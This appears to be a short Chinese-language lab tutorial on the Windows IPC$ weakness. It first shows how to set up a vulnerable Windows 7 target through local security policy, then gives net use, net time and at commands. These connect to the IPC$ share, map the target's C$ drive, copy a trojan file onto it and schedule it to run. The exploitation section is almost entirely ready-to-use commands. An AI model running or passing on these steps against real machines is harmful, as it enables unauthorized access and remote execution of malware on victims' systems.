IPC$漏洞创建
1.靶机地址:192.168.112.11
2.系统win7
1.目标机上编辑本地策略,运行 gpedit.msc
2.在 计算机配置 >windows设置 >安全设置 >本地策略 >安全选项 中找到 网络访问:本地账户的共享和安全模型 安全设置设为经典
3.将 账户:使用空密码的本地账户只允许进行控制台登录 设置为禁用
IPC$漏洞利用
IPC$漏洞地址:192.168.112.11
1.创建连接
net use \\192.168.112.11\ipc$
2.映射对方C盘到本地Z盘(不指定要Z盘,只要不与本地盘符重名就行)
net use z: \\192.168.112.11\c$
3.将木马文件拷贝到Z盘下,并查询对方当前时间
net time \\192.168.112.11
4.添加执行事件,在某时执行木马文件.等到规定时间内就会执行所选文件
at \\192.168.112.11 15:11 z:\test.exe
发表评论